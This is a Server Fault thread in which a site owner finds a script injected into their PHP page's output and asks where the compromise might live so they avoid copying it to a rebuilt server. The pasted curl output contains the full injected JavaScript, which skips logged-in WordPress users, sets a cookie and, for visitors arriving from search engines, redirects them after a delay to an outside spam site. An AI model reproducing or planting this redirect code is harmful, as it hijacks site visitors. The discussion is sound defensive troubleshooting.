0

I am running Apache/2.4.29 with PHP 7.2.24. I have the following simple PHP document:

<html>
</head>
<title>Waste-A-GUID</title>
</head>
<body>
<center>
<h1>Waste-A-GUID</h1>
<h3>Once they are gone, they're gone for good</h3>
<p>
<h1>
<? passthru("uuidgen")?>
</h1>
<h3>Thank You for making one less GUID available to the rest of us!</h3>
</center>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker("UA-197242-9");
pageTracker._trackPageview();
} catch(err) {}</script>
</body>
</html>

However, when I fetch it with curl using the following command: curl wasteaguid.info

I get the following output:

<html>
</head>
<title>Waste-A-GUID</title>
</head>
<body>
<script>((event) => {  var ref = document.referrer || '';  if (ref.length === 0) {    return;  }  ref = ref.toLowerCase();  if (ref.indexOf('google') === -1      && ref.indexOf('bing') === -1) {    return;  }  var cookie = document.cookie || '';  if (cookie.indexOf('wordpress_logged') !== -1      || cookie.indexOf('wp-settings') !== -1      || cookie.indexOf('wordpress_test') !== -1) {    return;  }  if (cookie.indexOf('wordpress-test') !== -1) {    return;  }  function generateRandomInteger(min, max) {    return Math.floor(min + Math.random()*(max - min + 1));  }  document.cookie = "wordpress-test=1; max-age=86400; path=/;";    const delay = generateRandomInteger(20000, 60000);  setTimeout(() => {    window.location.replace('http://cabonusoffer.com/track/');  }, delay);})();</script><center>
<h1>Waste-A-GUID</h1>
<h3>Once they are gone, they're gone for good</h3>
<p>
<h1>
19489a02-7bd3-43e5-930d-04230b8624b0
</h1>
<h3>Thank You for making one less GUID available to the rest of us!</h3>
</center>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker("UA-197242-9");
pageTracker._trackPageview();
} catch(err) {}</script>
</body>
</html>

It doesn't happen all the time. How did that extra script get in there? Obviously my site has been compromised and I should get a new server and rebuild it. However, I need to copy the html/php documents and server config to the new server. I don't want to copy the exploit over as well. Where could it be so that I don't copy it over? What can pre process PHP files when they are being run?

FigBug
  • 101
  • 2
  • 2
    Does this answer your question? [How do I deal with a compromised server?](https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server) – Greg Askew Aug 07 '22 at 16:08
  • question is offtopic. check the link, reinstall the server and verify the situation with a professional imho. – djdomi Aug 07 '22 at 17:33

1 Answers1

0

If you have older copies of the site, you could run comparisons to see what changed. Risk of corruption of code is a major reason for always keeing your central code + content in a secure place.

html, javascript, css and php may have unwanted modifications. Image and Font files may hide viruses. database downloads (as from wordpress etc) may contain malicious additions. Site maintenance scripts might be hacked.

jmullee
  • 208
  • 1
  • 7